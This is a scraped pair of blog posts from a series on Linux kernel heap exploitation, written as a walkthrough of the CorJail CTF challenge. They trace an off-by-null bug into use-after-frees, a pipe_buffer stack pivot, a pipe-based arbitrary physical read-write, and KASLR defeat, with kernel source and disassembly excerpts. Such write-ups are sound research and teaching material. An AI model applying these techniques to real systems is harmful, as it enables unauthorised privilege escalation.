[20] https://starlabs.sg/blog/2023/07-a-new-method-for-container-escape-using-file-based-dirtycred/

[21] https://www.offensivecon.org/speakers/2023/alex-plaskett-and-cedric-halbronn.html

[22] https://github.com/vobst/ctf-corjail-public/blob/master/test_privesc.c

[23] https://github.com/vobst/like-dbg-fork-public/blob/master/io/scripts/gdb_script_test_privesc.py

[24] https://www.offensivecon.org/speakers/2020/alexander-popov.html

[25] https://elixir.bootlin.com/linux/v5.10.127/source/kernel/fork.c#L1637

[26] https://elixir.bootlin.com/linux/v5.10.127/source/fs/namespace.c#L4111

[27] https://elixir.bootlin.com/linux/v5.10.127/source/arch/x86/entry/entry_64.S#L95

[28] https://elixir.bootlin.com/linux/v5.10.127/source/arch/x86/entry/entry_64.S#L571

[29] https://github.com/vobst/ctf-corjail-public/blob/master/libexp/rop.c#L112

[30] https://elixir.bootlin.com/linux/v5.10.127/source/kernel/kmod.c#L93

[31] https://www.kernelconfig.io/config_static_usermodehelper?arch=x86&kernelversion=6.3.12

[32] https://github.com/a13xp0p0v/kconfig-hardened-check

[33] https://github.com/a13xp0p0v/linux-kernel-defence-map

[34] https://mxatone.medium.com/randomizing-the-linux-kernel-heap-freelists-b899bb99c767

[35] https://www.usenix.org/conference/usenixsecurity22/presentation/zeng

[36] https://lwn.net/Articles/938637/

[37] https://www.usenix.org/conference/usenixsecurity23/presentation/lee-yoochan

[38] https://grsecurity.net/how_autoslab_changes_the_memory_unsafety_game

[39] https://github.com/thejh/linux/blob/slub-virtual/MITIGATION_README

[40] https://googleprojectzero.blogspot.com/2023/08/summary-mte-as-implemented.html

[41] https://www.youtube.com/watch?v=UwMt0e_dC_Q

[42] https://github.com/thejh/linux/commit/f3afd3a2152353be355b90f5fd4367adbf6a955e

[43] https://en.wikipedia.org/wiki/Control-flow_integrity#Microsoft_Control_Flow_Guard

[44] https://googleprojectzero.blogspot.com/2019/02/examining-pointer-authentication-on.html

[45] https://bazad.github.io/presentations/BlackHat-USA-2020-iOS_Kernel_PAC_One_Year_Later.pdf

[46] https://lwn.net/Articles/926649/

[47] https://lwn.net/Articles/940403/

[48] https://elixir.bootlin.com/linux/v5.10.127/source/arch/arm64/Kconfig#L1510

[49] https://github.com/lkrg-org/lkrg/blob/47191f9b29ae22fe703c52993416824ef7fa29ec/src/modules/exploit_detection/p_exploit_detection.c#L1215

[50] https://github.com/lkrg-org/lkrg/blob/47191f9b29ae22fe703c52993416824ef7fa29ec/src/modules/exploit_detection/p_exploit_detection.c#L1363

[51] https://github.com/lkrg-org/lkrg/blob/47191f9b29ae22fe703c52993416824ef7fa29ec/src/modules/exploit_detection/p_exploit_detection.c#L1382

[52] https://github.com/lkrg-org/lkrg/blob/47191f9b29ae22fe703c52993416824ef7fa29ec/src/modules/exploit_detection/p_exploit_detection.c#L1326

[53] https://a13xp0p0v.github.io/2021/08/25/lkrg-bypass.html

[54] https://github.com/milabs/lkrg-bypass

[55] https://blog.siguza.net/APRR/

[56] https://www.google.com/url?q=https://bazad.github.io/presentations/BlackHat-USA-2020-iOS_Kernel_PAC_One_Year_Later.pdf&sa=U&ved=2ahUKEwiIg_GSgteAAxWzK7kGHYCgCdUQFnoECAoQAg&usg=AOvVaw12Yeao3WAUNwGg03EwzZib

[57] https://learn.microsoft.com/en-us/windows-hardware/design/device-experiences/oem-vbs

[58] https://www.samsungknox.com/en/blog/real-time-kernel-protection-rkp

[59] https://googleprojectzero.blogspot.com/2017/02/lifting-hyper-visor-bypassing-samsungs.html

[60] https://github.com/heki-linux

Linux S1E2: From UAF in km32 to IP Control or Arbitrary Read-Write

2023-08-05T00:00:00+00:00

_Note: This is the second post in a series on Linux heap exploitation. It assumes that you have read the first part [0]. You can play with the exploit [1] yourself using the kernel debugging setup [2] published alongside this series.

We concluded the previous post by abusing a use-after-free (UAF) in the kmalloc-32 cache to leak three kernel pointers. Now, we will use those leaks to cause another UAF, this time in the kmalloc-1k cache. By the end of this post, we will have learned how to turn this second, more powerful UAF either into kernel code execution via ROP or into an arbitrary read-write primitive via pipes.

Causing a More Powerful UAF

At the moment, we have a UAF in kmalloc-32 to play with. However, many standard techniques for constructing code execution or arbitrary read/write primitives require a UAF in a larger cache, e.g., the normal kmalloc-1k cache.

We begin by introducing the ansatz used to create another UAF from a conceptual standpoint before discussing the concrete realization. For starters, suppose that we can allocate a node in some singly linked list on the UAF slot in kmalloc-32, c.f., the figure below (red cross indicates existence of a dangling reference).

Causing a free of the dangling reference will now allow us to replace the node with another object. If we can control the contents of the reclaiming object, we can fake a list node to include an unsuspecting object at a known address in the list, c.f., the figure below.

Having read the previous blog post, you might have already guessed what will happen next: we trigger a list cleanup and arbitrarily free the unsuspecting object, i.e., we constructed the primitive to free an arbitrary pointer.

Realizing this idea will again be done by corrupting a poll_list. First, we must decide which kind of object we would like to free. Recall that we leaked the address of a slot in a kmalloc-1k slab that is currently occupied by a tty_struct. However, nothing prevents us from allocating another object in its place, and we are going to use this freedom to allocate an array of pipe_buffer structures at the known address. One such array is allocated whenever a new pipe is created [4]. We will elaborate on the semantics of these objects later, for the moment you must trust me that those make them interesting for exploitation. The next figure shows the desired memory transformation, starting from the memory layout we finished with at the end of the previous post.

Note: Experiments showed an increase in exploit stability when performing this step last. Conceptually this changes nothing, as long as the replacement happens before the pointer is freed, but it might throw you off when reading the code [5]. The decrease in stability makes sense as freeing the ttys is a rather noisy operation that, among other things, frees up many slots in the kmalloc-32 slab containing the UAF slot.

Next, we are going to free up the UAF slot and allocate a poll_list node on it. Recall that the slot is currently shared by a user_key_payload and a seq_operations structure. Furthermore, we do not know which seq_operations is occupying the UAF slot, however, we do know which key is corrupted. Thus, we avoid having to free many objects at once by using the key to free up the UAF slot. Spraying another round of poll_list lists reclaims the slot and leaves us with the following situation in kmalloc-32.

Aside: At this point, we meet a potential problem: user keys are freed via a Read Copy Update (RCU) callback [6]. RCU is a generic technique to improve the performance of shared read-mostly data structures. The idea is that readers enter a so-called RCU read-side critical section before accessing the data structure. While inside this section they are guaranteed that entries they obtain will remain valid, i.e., not be destroyed by someone who is concurrently manipulating the same data structure. This is achieved by delaying the actual destruction of an entry until all preexisting read-side critical sections are finished, i.e., after waiting for the so-called RCU grace period [7]. Regarding exploitation, this means that there is no point in starting to spray the heap right after an object we want to reclaim has been marked for freeing by RCU. Instead, we want to spray right after the object has been freed. Luckily, there is a system call that does nothing but wait until an RCU grace period has elapsed before returning, and we can use it to synchronize the start of our spray [8] [9].

Finally, what remains is to replace the poll_list allocated on the UAF slot with a fake one that points to the pipe_buffer array living in kmalloc-1k. For that purpose, we free all the seq_operations and use the setxattr technique to write the fake next pointer to the first QWORD of the vacant slots. However, leaving the UAF slot unoccupied for too long is not a good idea as it might lead to double frees, or unpredictable behavior in case the slot is reclaimed by an unrelated object. Thus, we “conserve” the fake pointer by allocating a user_key_payload, which leaves the first two QWORDs untouched.

Returning from the poll system call will now arbitrarily free a bunch of pipe_buffers. This is our more powerful UAF. Thanks for staying with me throughout this tedious sequence of steps. Now I owe you an explanation why it was worth going through this pain.

Aside: Some techniques are applicable without this extra sequence of steps. For example, we could trigger the destruction of the slab that contains the UAF slot, causing the backing page to be returned to the Page Allocator. Since the pages backing kmalloc-32 slabs are of order zero, i.e., a kmalloc-32 slab is made of 2^0 pages, it is simple to re-allocate the page as last-level user page tables. Accessing the UAF slot through a dangling pointer will now operate directly on user page table entries, which already sounds like a recipe for disaster. With a little work, this situation can be turned into a strong read-write primitive for physical memory that allows for trivial privilege escalation, e.g., by patching the kernel text [10] [11].

Abusing Fake C++ for Stack Pivots

There is a C coding pattern, which can be found in many large code bases, where an instance of a generic structure type might represent one of many more concrete objects. If this reminds you of runtime polymorphism you are well on track. The poster child example in Linux is probably struct file. There is one for every open file in the system, and as you probably heard a hundred times, for user space “everything is a file”. This leaves the kernel with a situation where an instance of a file might represent a hardware timer, a BPF map, a development board, an end of a pipe, a network connection, or … an ordinary file on an ordinary hard disk using an ordinary ext4 filesystem.

To manage this situation, the generic structure has two key fields

struct file {
	...
	const struct file_operations	*f_op;
    ...
	void			*private_data;
    ...
} __randomize_layout

where the first one, i.e., f_op, is defined as another rather generic struct, this time full of function pointers.

struct file_operations {
    ...
	ssize_t (*read) (struct file *, char __user *, size_t, loff_t *);
	ssize_t (*write) (struct file *, const char __user *, size_t, loff_t *);
	...
	int (*mmap) (struct file *, struct vm_area_struct *);
	...
	int (*open) (struct inode *, struct file *);
	...
} __randomize_layout;

High-level code, e.g., in the virtual file system layer, will perform the C equivalent of a virtual call to dispatch operations to the lower-level routines that know how to perform them for the given kind of file.

ssize_t vfs_read(struct file *file, char __user *buf, size_t count, loff_t *pos)
{
	...
	if (file->f_op->read)
		ret = file->f_op->read(file, buf, count, pos);
	...
}

Aside: When reading kernel code those virtual calls are a frequent source of frustration as one oftentimes does not know which handler will be invoked for the object one is interested in. In such situations the rescue comes in the form of my favorite command: trace-cmd [12]. For example, we can use it to easily resolve the read handlers for various kinds of files.

$ trace-cmd record -p function_graph -g vfs_read --max-graph-depth 2 -F cat /proc/sys/kernel/modprobe
cat-4497  [001] 13316.293420: funcgraph_entry:                   |  vfs_read() {
...
cat-4497  [001] 13316.293421: funcgraph_entry:      + 28.696 us  |    proc_sys_read();
cat-4497  [001] 13316.293450: funcgraph_exit:       + 29.772 us  |  }
$ trace-cmd record -p function_graph -g vfs_read --max-graph-depth 2 -F cat /tmp/hax
cat-4519  [009] 13401.049113: funcgraph_entry:                   |  vfs_read() {
...
cat-4519  [009] 13401.049114: funcgraph_entry:        0.444 us   |    shmem_file_read_iter();
cat-4519  [009] 13401.049114: funcgraph_exit:         1.158 us   |  }
$ trace-cmd record -p function_graph -g vfs_read --max-graph-depth 2 -F cat /home/archie/bar
cat-4539  [005] 13493.856387: funcgraph_entry:                   |  vfs_read() {
...
cat-4539  [005] 13493.856389: funcgraph_entry:        0.981 us   |    ext4_file_read_iter();
cat-4539  [005] 13493.856390: funcgraph_exit:         2.857 us   |  }
$ trace-cmd record -p function_graph -g vfs_read --max-graph-depth 2 -F cat /sys/fs/bpf/maps.debug
cat-4364  [004]   221.406352: funcgraph_entry:                   |  vfs_read() {
...
cat-4364  [004]   221.406352: funcgraph_entry:        0.863 us   |    bpf_seq_read();
cat-4364  [004]   221.406353: funcgraph_exit:         1.689 us   |  }

The subsystem code that creates the objects will usually set the vtable pointer to a subsystem-internal constant variable that specifies the functions that know how to operate on the file {1}. Furthermore, it usually stores a pointer to an object that holds more specific information in the private_data member {2}, which makes the information available to the handlers as their parameters always include a pointer to the file object that they were invoked on. Yes, this smells a lot like subclassing.

const struct file_operations pipefifo_fops = {
	...
	.read_iter	= pipe_read,
	.write_iter	= pipe_write,
	...
};

int create_pipe_files(struct file **res, int flags) {
	struct inode *inode = get_pipe_inode();
	struct file *f;
	...
	f = alloc_file_pseudo(inode, pipe_mnt, "",
				O_WRONLY | (flags & (O_NONBLOCK | O_DIRECT)),
				&pipefifo_fops); // {1}, sets f->f_op = &pipefifo_fops
	...
	f->private_data = inode->i_pipe; // {2}, struct pipe_inode_info *
    ...
}

Okay, but why care about object-oriented ideas in a programming language more than twice my age? We care because essentially all kernel exploits that gain code execution do so by corrupting an object that has a vtable with the intention of hijacking a virtual call. The idea is relatively straightforward: arbitrarily free an object at a known address and replace it with user-controlled data. The fake object’s vtable will point back into the controlled data, where the virtual call will finally find the address of a stack pivot gadget. Pivoting the stack into controlled data is feasible as at least the register providing the ‘self’ argument must point to the corrupted object, however, usually more registers will contain useful values.

There are a few properties that we would like the victim object to have:

Faking it should be easy. If the object is used in complicated ways before the virtual call happens the bar of creating a convincing fake rises, which we want to avoid as we are lazy.
Pivoting should be easy. At the point where we take instruction pointer (IP) control the CPU registers should be full of pointer into controlled data such that we do not have to spend ages looking for ROP/JOP gadgets.
Reclaiming it should be easy. While it is possible to reclaim objects across cache boundaries by taking a detour to the Page Allocator, it is better if the victim object is allocated in the same cache as an easily sprayable user data container. Luckily, our array of pipe_buffers meets all those requirements.

When the last reference to a pipe is released, it will be destroyed. During that process, the code will eventually iterate over all pipe_buffers and call their destructors. This is where we will take IP control.

void free_pipe_info(struct pipe_inode_info *pipe) {
    ...
    for (i = 0; i < pipe->ring_size; i++) {
        struct pipe_buffer *buf = pipe->bufs + i; // dangling pointer
        if (buf->ops) // {1}
            pipe_buf_release(pipe, buf);
    }
    ...
}
static inline void pipe_buf_release(struct pipe_inode_info *pipe,
                                    struct pipe_buffer *buf) {
    const struct pipe_buf_operations *ops = buf->ops;
    buf->ops = NULL;
    // `buf` points into our data and we control value of `ops`
    ops->release(pipe, buf);
}

Crafting our payload, however, requires examining what the compiler made of that code.

mov	rcx, qword ptr [rbx + 152]          # rcx = pipe->bufs
movsxd	rdx, ebp
lea	rsi, [rdx + 4*rdx]
mov	rdx, qword ptr [rcx + 8*rsi + 16]   # rdx = (pipe->bufs+i)->ops
test	rdx, rdx
je	0xffffffff812f0d9f <free_pipe_info+0x2f>
lea	rax, [rcx + 8*rsi]
add	rax, 16                             # rax = &(pipe->bufs+i)->ops
lea	rsi, [rcx + 8*rsi]                  # rsi = pipe->bufs+i
mov	qword ptr [rax], 0
mov	r11, qword ptr [rdx + 8]            # r11 =(pipe->bufs+i)->ops->release
mov	rdi, rbx
call	0xffffffff81e02300 <__x86_indirect_thunk_r11> # retpoline "call r11"

As we can see in the above listing, rcx, rdx, rax, and rsi hold interesting values. Equipped with that knowledge we can start crafting our ROP payload. Since we allocate our data as user_key_payload objects we must not forget to account for the structure header, which is unfortunately not under our control. Consequently, a naive overlay would result in the len field overlapping with the first buffer’s ops field, making the condition {1} pass on an uncontrolled value. However, as the SLUB allocator performs only limited alignment checks on allocations and frees, we can adjust the relative position by performing a misaligned free, causing the loop to skip the first buffer.

The first gadget pivots the stack to the first QWORD of controlled data, while the second one skips over the part that was used to pivot the stack and leaves us at the start of the ROP chain responsible for privilege escalation.

Doing kernel ROP sounds cool, but in practice, it has several drawbacks that make it unattractive. For example, portability is hampered by the need to manually search for new ROP gadgets and control flow integrity (CFI) might make life harder on some platforms. Therefore, we will now discuss how to construct a primitive that will allow for a data-only privilege escalation.

Aside: While crafting my first kernel ROP chain I noticed that some things are different from in user land exploitation. Let me elaborate on two of them here. First, the kernel is a self-modifying program. Thus, what you get when disassembling the image’s text section is not what you will find in executable memory at runtime. Fortunately, I read about this before it first happened to me, and thus I quickly figured out what was going on [13]. Be advised to dump the executable mappings at runtime and use them as input for ROP gadget finders. The second thing is already visible in the assembly listing above, but it took me way longer to figure it out. In fact, I have not read it anywhere yet. To mitigate against spectre family attacks, the kernel might use so-called retpolines when performing indirect control flow transfers [14]. Retpolines are semantically equivalent to jmp REG or call REG operations, which makes them interesting for building ROP chains, but manifest themselves as calls to fixed addresses in the disassembly. As I am used to discarding gadgets that end in calls to fixed addresses when building user land ROP chains this oversight led to me missing many potentially useful gadgets.

Abusing |’s for Arbitrary Read and Write

Despite using pipelines in every second shell command, it was not until exploring the Dirty Pipe vulnerability that I had a look into their implementation [15] [16]. In essence, a pipe is a circular, in-kernel buffer that can be read from and written to by user space through file descriptors. For example, when executing a pipeline, the parent shell creates a pipe and hands the disparate ends to the subshells that execute the commands, which use it to connect their stdin and stdout streams.

$ strace -e pipe2,dup2 -f sh -c "cat /tmp/hax | cat"
pipe2([3, 4], 0)                       = 0
strace: Process 4975 attached
[pid 4975] dup2(4, 1)                 = 1
strace: Process 4976 attached
[pid 4976] dup2(3, 0)                 = 0

For each pipe, the kernel maintains a pipe_inode_info structure that, among other things, tracks the positions in the circular buffer that data will be read from or written to the next time user space interacts with the pipe. The next figure shows a partially filled pipe.

However, the above picture is grossly oversimplified, and understanding the exploitation technique requires digging a bit deeper into the implementation. In particular, the circular buffer is realized through multiple non-contiguous pages of memory, each of which is managed by a pipe_buffer structure. The pipe_buffer contains a pointer to the page describing the underlying memory, as well as the offset and length of the user data currently stored on the page. As we can see in the next figure, this indirection allows minimizing the pipe’s memory footprint.

Finally, we need to make one last adjustment to our mental picture, namely that the kernel stores the pipe_buffers in a heap-allocated array, a pointer to which is kept in the bufs member of pipe_inode_info. The integers head and tail are indices into this array, and circularity is implemented by masking them with the array length, aka. ring_size, which is a power of two, minus one before each access. It is exactly an array of this kind that we arbitrarily freed earlier.

Given that background, there is not much creativity involved in devising a way to abuse the UAF to create an arbitrary read-write primitive. By setting the page, offset, and len fields of the tail buffer before performing an i/o operation on the pipe, we can read from or write to arbitrary RAM-backed physical addresses.

The conversion between physical, virtual, and page addresses required for this technique involves two distinct regions in the kernel’s virtual memory space: the direct map and the vmemmap region. The former is, as the name suggests, a direct map of all physical memory of the system, while the latter is an array of page structures describing this memory, c.f., the figure below for a simplified illustration.

Until now, it was sufficient to corrupt the arbitrarily freed object once, e.g., to replace it with a fake object for stack pivoting. However, we plan to scan substantial amounts of physical memory, and thus we need to be able to edit the pipe_buffer array repeatedly. Performing thousands of free and reclaim races sounds like an excellent recipe for crashing the kernel. Thus, another approach is needed. Ideally, we want a user data container without any headers whose contents we can update without reallocating it. Luckily, tty write buffers give us just that primitive [17].

Aside: There is another way to solve this problem by using a second pipe. The first pipe is corrupted once such that the pipe_buffer at tail references the page containing the pipe_buffer array. Then, we splice the whole buffer into a second pipe. Now, the catch is that pipes keep one scratch page for performance reasons, and through careful manipulation of the second pipe we can make sure that its scratch page is always the one containing the first pipe’s buffer array [18].

Aside: Besides the page, offset, and len members, there is one more thing we need to initialize in the pipe_buffer if we want to use it for writing: the flags. In particular, we need to set the PIPE_BUF_FLAG_CAN_MERGE flag to indicate that it is okay to “append” subsequent writes to this buffer. Yes, that is the flag that caused all the Dirty Pipe trouble and I still forgot to initialize it.

Aside: After our sprays we will own plenty of pipes and ttys, however, we do not know which pipe is corrupted and which tty is responsible for it. We can use the FIONREAD ioctl on the pipe, which returns the number of bytes that can be read from it, together with unique write buffer payloads to figure out the pairing [19].

Kernel Address Space Layout Randomization (KASLR) Revisited

Before we can proceed, we need to take a step back and take a closer look at the leaks we collected in the previous blog post.

Recall that we leaked a pointer to a page as well as a pointer to a heap-allocated tty_struct. The former points into the kernel’s vmemmap-region, while the latter points into a RAM-backed section of the kernel’s direct map, also known as page-offset, region, which maps all of physical memory [20].

Both regions are randomized independently at kernel startup with a granularity of one GiB, which is the size of memory covered by a Page Upper Directory (PUD) entry [21]. Due to constraints on the layout of virtual memory, the entropy of the randomization is about 15 bits according to a comment by the developers. Furthermore, the region’s ordering must remain unchanged. Note that the randomized regions may start above or below their nonrandomized base addresses, which are 0xffffea0000000000 and 0xffff888000000000, respectively [21].

Without further assumptions, it is only possible to extract the base address of a memory region from a valid pointer if we know that the pointer’s base offset cannot be larger than the randomization granularity. This immediately implies that, in the general case, it is not possible to extract the page_offset_base from a valid pointer into the direct map. At least on systems with more than one GiB of RAM.

However, for the leaked page pointer the situation is less certain. As the size of struct page is 64 bytes, a vmemmap region of size one GiB can describe 64 GiB of physical memory. On my laptop with 32 GiB of RAM, for example, the size of the physical memory space is 34 GiB, which would make every valid page pointer splittable into the Page Frame Number (PFN) and the vmemmap_base.

Assuming that we can split the leaked page pointer, the pipe-based physical read primitive can be used to search for the kernel image. According to the documentation of the RANDOMIZE_BASE configuration option, the virtual and physical base addresses of the kernel image are randomized separately [22]. Consequently, our virtual kernel image leak is useless for this task. Furthermore, we know that the kernel can be anywhere between 16 MiB and the top of physical memory, which we take to be 64 GiB, with a worse-case granularity of 2 MiB [23] [24].

This results in about ~30k possible base addresses. The number of read operations can be reduced further by incorporating that the kernel text section alone is usually already larger than 10 MiB. Thus, by reading only every fifth possible physical base, we can derandomize the kernel in about 6k reads, at worst. Afterwards, reading the page_offset_base variable from the data section finally allows us to convert back and forth between virtual and physical addresses.

Aside: If we cannot split the leaked page pointer, we might as well throw a coin, i.e., start searching the kernel base either towards lower or higher physical addresses. As this might lead to invalid accesses beyond the vmemmap region we introduce a 50% probability of failure at this point.

Aside: While developing the original version of my exploit, I did not pay sufficient attention to this topic. I simply assumed that the leaked physmap pointer is always splittable, which was only true since ASLR was disabled. However, as we saw above the pipe-based exploit flow can still work by first finding the kernel image. Nevertheless, it would still be nice to have ASLR enabled in the development stage to avoid making such mistakes in the future. For debugging, randomization of the kernel image, both physical and virtual, is a pain. Unfortunately, as far as I know, there is no way to selectively enable the randomization of the vmemmap, vmalloc, and page-offset regions. We can help ourselves around that restriction by disabling ASLR on the kernel command line, which will make the boot stub decompress the kernel at the physical address 0x1000000 and maps it to the virtual address 0xffffffff81000000 [25] [26]. After jumping into the decompressed kernel, we can use the debugger to edit the boot parameters to pretend that ASLR is enabled, which will result in the randomization of the other memory regions [27]. In the future, it would be nice to automate debugging with full ASLR enabled.

Finding our Task Struct

With that technicality out of the way, we can start to explore physical memory. An obvious target for a data-only privilege escalation is the task_struct of the exploit process, which is the structure that the kernel uses to track all kinds of information needed to run the task. In order to find it, we can leverage the fact that it includes the process’ comm, which is a 16-byte name that we can set using a prctl command. Setting the comm prior to searching reduces the risk of finding a stale task struct of a dead tread. Additionally, it is recommended to perform additional sanity checks on each instance of the name found during the memory scan to ensure that it indeed belongs to our task descriptor, and not to, for example, the page cache entry of our executable or our process’ address space.

Wrap Up

Constructing an arbitrary free primitive from our UAF in kmalloc-32 allowed us to cause a UAF on a pipe_buffer array. Afterwards, we explored two ways to capitalize on this. First, we reclaimed the freed slot with a user_key_payload that contained a fake pipe_buffer whose destructor was manipulated to trigger a stack pivot into a ROP chain stored in the same buffer. Second, we reclaimed the slot with a tty write buffer, which gave us the freedom to repeatedly overwrite the pipe_buffer. With a little bit of background on how pipes work, this primitive enabled us to scan physical memory to locate our task descriptor.

In the next post, we will recollect why we are doing this whole exercise. On a conceptual level, the goal is to elevate the privileges of our process, however, as we will discover many mechanisms act together to define what is commonly referred to as a process’ privileges. Our task will be to identify the parameters we need to tweak to perform the privileged action we need to win the challenge, i.e., reading a file in the root users’ home directory. Furthermore, we will learn how to easily experiment with different privilege escalation approaches to develop stable exploit routines, using both, the code execution and the read write primitive.

References

[0] https://blog.eb9f.de/2023/07/20/Linux-S1-E1.html

[1] https://github.com/vobst/ctf-corjail-public

[2] https://github.com/vobst/like-dbg-fork-public

[4] https://elixir.bootlin.com/linux/v5.10.127/source/fs/pipe.c#L806

[5] https://github.com/vobst/ctf-corjail-public/blob/master/sploit.c#L478

[6] https://elixir.bootlin.com/linux/v5.10.127/source/security/keys/user_defined.c#L128

[7] https://pdos.csail.mit.edu/6.S081/2022/readings/rcu-decade-later.pdf

[8] https://elixir.bootlin.com/linux/v5.10.127/source/kernel/sched/membarrier.c#L470

[9] https://github.com/lrh2000/StackRot

[10] https://yanglingxi1993.github.io/dirty_pagetable/dirty_pagetable.html

[11] https://googleprojectzero.blogspot.com/2021/10/how-simple-linux-kernel-memory.html

[12] https://www.youtube.com/watch?v=JRyrhsx-L5Y

[13] https://a13xp0p0v.github.io/2021/02/09/CVE-2021-26708.html

[14] https://support.google.com/faqs/answer/7625886

[15] https://dirtypipe.cm4all.com/

[16] https://lolcads.github.io/posts/2022/06/dirty_pipe_cve_2022_0847/

[17] https://github.com/0xkol/badspin

[18] https://www.interruptlabs.co.uk/articles/pipe-buffer

[19] https://github.com/vobst/ctf-corjail-public/blob/master/libexp/rw_pipe_and_tty.c#L77

[20] https://www.kernel.org/doc/html/v5.10/x86/x86_64/mm.html

[21] https://elixir.bootlin.com/linux/v5.10.127/source/arch/x86/mm/kaslr.c#L64

[22] https://elixir.bootlin.com/linux/v5.10.127/source/arch/x86/boot/compressed/misc.c#L413

[23] https://elixir.bootlin.com/linux/v5.10.127/source/arch/x86/Kconfig#L2122

[24] https://elixir.bootlin.com/linux/v5.10.127/source/arch/x86/Kconfig#L2162

[25] https://elixir.bootlin.com/linux/v5.10.127/source/arch/x86/Kconfig#L2064

[26] https://elixir.bootlin.com/linux/v5.10.127/source/arch/x86/boot/compressed/misc.c#L341

[27] https://github.com/vobst/like-dbg-fork-public/blob/d2d50a5bce3986fe30cd43bf8595825dd7266324/io/scripts/gdb_script_partial_kaslr.py

Linux S1E1: From Off-by-Null to Kernel Pointer Leaks

2023-07-20T00:00:00+00:00

About a year ago, I remember watching a video series by LiveOverflow, a security researcher with a well-known Youtube channel, on him “getting into” browser exploitation [0]. Don’t ask me about any technical details, but what stuck with me is the way he describes how this video series came about; He reflects that he had been interested in the topic for quite a while, regularly annoying experienced researcher with the typical beginner question: “How do I get into it?”, but always just shying away from actually committing to leaning about it - thinking that the topic was too complex, the entry barrier to high.

No clue if that is really what he said in the video, but it is what stuck with me, probably since it was echoing some thoughts of my own; What was browser exploitation for him, was kernel exploitation for me. So, this three-part series is the answer I finally gave to my question “How to get into kernel exploitation?”; Just start somewhere, do not wait for the perfect time, just start - the rest you will pick up along the way.

These posts document how I got started with kernel exploitation. They are written by a beginner for beginners. On the upside this might imply that they provide a resource more accessible than the, often pretty brief, writeups by experienced researchers that gloss over many of the pitfalls that we get caught in. On the downside, however, it means you should take everything I say with a grain of salt. If you spot mistakes, do not hesitate to let me know.

Where to Start?

LiveOverflow started by analyzing an exploit by a fellow security researcher for a vulnerability that researcher discovered in the SpiderMonkey JavaScript engine. I had no clue where to start, and more or less by chance ended up with a CTF challenge that I read about recently.

Last year’s CorCTF [2] featured the CorJail [3] challenge, which, if I recall correctly, was only solved by a member of the organizing team. I started by carefully reading the writeup [4] by the challenge author and then got to work.

The Single Most Important Thing

Of course, we will conclude this series with a section on learnings and reflections, however, let me spoiler the most important one up front: get yourself a proper debugging setup.

Luckily for us, the challenge repository contains the kernel configuration and patches used for building the image, and thus I started by recompiling the kernel with all the debugging features I wanted. Then I proceeded with building the root filesystem, modifying it to give myself regular root access before launching the unprivileged shell from which we eventually want to elevate our privileges back again.

Next let us turn to the vulnerable kernel module. Since source code was available, recompiling it with debug information would have been an option, however, it loaded without problems, and we will not spend much time in there anyway.

Finally, we need a way to debug the kernel. I used my fork of the fabulous like-dbg [5] setup, which is a great platform for building your personal kernel debugging and exploit development environment. Importantly, we also need a way to run custom gdb scripts, which can be easily archived using this setup.

With scripts, symbols and source code debugging in place, let us go ahead and dissect the vulnerable kernel module.

Aside: You can find a release of the setup on GitHub [6]. You might want to use it together with the exploit [7] to follow along with the series.

Exploring the Challenge

Like many other kernel CTF challenges, the rootfs contains a custom kernel module that is loaded on boot. However, I like that it is not just some toy driver whose only purpose is to be exploited; The author actually took a kernel patch that was proposed on the mailing list and split it up into a change to the core kernel and a stand-alone module.

In particular, the kernel patch implements per-cpu syscall counters, and the kernel module exposes them to user space via a file in procfs. We can display the counters by reading from the file and filter the shown system calls by writing to it.

root@CoROS:~1 cat /proc/cormon

      CPU0      CPU1      CPU2      CPU3        Syscall (NR)

        15        12        26         8        sys_poll (7)
         0         0         0         0        sys_fork (57)
        47        51        71        66        sys_execve (59)
         0         0         0         0        sys_msgget (68)
         0         0         0         0        sys_msgsnd (69)
         0         0         0         0        sys_msgrcv (70)
         0         0         0         0        sys_ptrace (101)
        14         4        19         9        sys_setxattr (188)
        11        23        17        25        sys_keyctl (250)
         0         0         2         0        sys_unshare (272)
         0         0         0         0        sys_execveat (322)

root@CoROS:~2 echo -n 'sys_pipe' > /proc/cormon
[   57.315786] [CoRMon::Debug] Syscalls @ 0xffff888104681000
root@CoROS:~3 cat /proc/cormon

      CPU0      CPU1      CPU2      CPU3        Syscall (NR)

         3        13         3         2        sys_pipe (22)

There are few standardized places where auto loaded drivers should be specified, and we find the cormon driver in /etc/modules. Loading it into BinaryNinja, we can confirm that on load this module creates a file in the proc pseudo file system {1}.

0000049f  uint64_t init_module()

000004a7      printk(0x668)
000004cc      int32_t rbx
000004cc      if (proc_create(0x5a3, 0x1b6, 0, 0x750) == 0)  {"cormon"} // {1}
000004d5          printk(0x698) // [CoRMon::Error] proc_create() call failed!
000004da          rbx = -0xc
000004ea      else
000004ea          int32_t rax_2 = update_filter(buffer: "sys_execve,sys_execveat,sys_fork…")
000004ef          rbx = rax_2
000004f3          if (rax_2 != 0)
00000503              rbx = -0x16
000004fc          else
000004fc              printk(0x6c8) // [CoRMon::Init] Initialization complete!
000004e2      return zx.q(rbx)

The fourth argument of the call to proc_create specifies which functions the kernel will invoke when user space interacts with the file.

00000750  cormon_proc_ops:
00000750  00 00 00 00 00 00 00 00                          ........

00000758  void* data_758 = cormon_proc_open
00000760  void* data_760 = seq_read

00000768                          00 00 00 00 00 00 00 00          ........

00000770  void* data_770 = cormon_proc_write

The bug is in the write handler cormon_proc_write.

00000384  int64_t cormon_proc_write(int64_t filp, int64_t buf, int64_t len, int64_t* ppos)
...
000003b6      if (len u> 0x1000) // {2}
00000449          bytes_to_copy = 0xfff // {3.1}
000003bc      else
000003bc          bytes_to_copy = len // {3.2}
000003d6      char* buffer = kmem_cache_alloc_trace(*(kmalloc_caches + 0x60), 0xa20, 0x1000) // {4}
...
0000040f              __check_object_size(buffer, bytes_to_copy, 0)
0000041d              bytes_not_copied = _copy_from_user(buffer, buf, bytes_to_copy) // {5}
00000425          if (bytes_not_copied != 0)
00000478              printk(0x630)
0000047d              err = -0xe
00000427          else
00000427              buffer[bytes_to_copy] = 0 // {6}
00000435              if (update_filter(buffer: buffer) != 0)
00000489                  kfree(buffer)
0000048e                  err = -0x16
0000043a              else
0000043a                  kfree(buffer)
0000043f                  err = len
00000448      return err

Here, len and buf are the arguments user space passed to the write system call. At {2} the function validates the length argument, however, there is an obvious inconsistency between the assignments {3.1} and {3.2} when the length is equal to 0x1000. A buffer of fixed size 0x1000 is allocated at {4} and filled with user data at {5}. No buffer overflows occur at this point as bytes_to_copy is guaranteed to be <= 0x1000. However, the code expects that the truncated user data might not be null-terminated, and an out-of-bounds write of the terminating null byte might occur at {6}.

